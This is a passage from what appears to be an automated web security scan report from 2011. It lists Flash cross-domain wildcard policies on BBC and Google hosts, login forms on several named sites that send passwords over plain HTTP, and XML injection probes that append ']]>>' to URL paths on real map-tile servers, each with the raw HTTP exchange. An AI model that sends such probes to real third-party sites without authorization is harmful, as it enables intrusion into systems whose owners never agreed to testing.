Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 18 Jul 2011 01:52:35 GMT
Date: Mon, 18 Jul 2011 01:50:35 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.11. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 22:49:01 GMT
Expires: Mon, 18 Jul 2011 22:49:01 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 12083
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.12. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:20:35 GMT
Date: Mon, 18 Jul 2011 02:20:35 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

4.13. http://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 18 Jul 2011 11:39:17 GMT
Date: Sun, 17 Jul 2011 11:39:17 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 52615

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.14. http://khm0.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: khm0.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:16:35 GMT
Expires: Mon, 18 Jul 2011 02:16:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.15. http://khm1.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm1.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: khm1.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:16:36 GMT
Expires: Mon, 18 Jul 2011 02:16:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.16. http://mt0.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt0.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:17:07 GMT
Expires: Mon, 18 Jul 2011 02:17:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.17. http://mt1.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt1.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt1.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:17:33 GMT
Expires: Mon, 18 Jul 2011 02:17:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.18. http://mt2.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt2.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt2.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:18:06 GMT
Expires: Mon, 18 Jul 2011 02:18:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.19. http://mt3.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt3.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt3.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:18:51 GMT
Expires: Mon, 18 Jul 2011 02:18:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

5. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.4. http://cache.vzw.com/globalnav/globalnav.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /globalnav/globalnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /globalnav/globalnav.js?v=11-07 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: V1Z2=3xlMvMj_CbTxnhht02f2kBIf0Q_iHTboFH9keTnkzyH6sfkWs7khIog

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Jul 2011 03:09:35 GMT
ETag: "13207-4e1faf6f"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 78343
Date: Mon, 18 Jul 2011 13:01:23 GMT
Connection: close

/*******************************************************************************
Version 11.7.7 GlobalNav.js - js functions for creating the globalnav
*********************************************
...[SNIP]...
</div>';
           };

           div.innerHTML +=
               '<form id="signInForm" method="post" action="'+ this.loggedInURL +'" autocomplete="off">'+
       
               '<input type="hidden" name="goto" id="goto" value="'+ this.goTo +'"/>
...[SNIP]...
</label>'+
               '<input type="password" onfocus="inputSignIn(this,event)" onblur="inputSignIn(this,event)" autocomplete="off" maxlength="20" name="IDToken2" id="IDToken2_GN" value="" /><div class="clear15">
...[SNIP]...

5.5. http://support.dnsstuff.com/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /Login.aspx HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7476


<?xml version="1.0" encoding="UTF-8" ?>

<!-- ... -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="h
...[SNIP]...
<body class="Login ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
<br />
               <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 100%" />
           </td>
...[SNIP]...

6. XML injection
There are 8 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


6.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt0.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt0.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt0.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt0.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt1.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

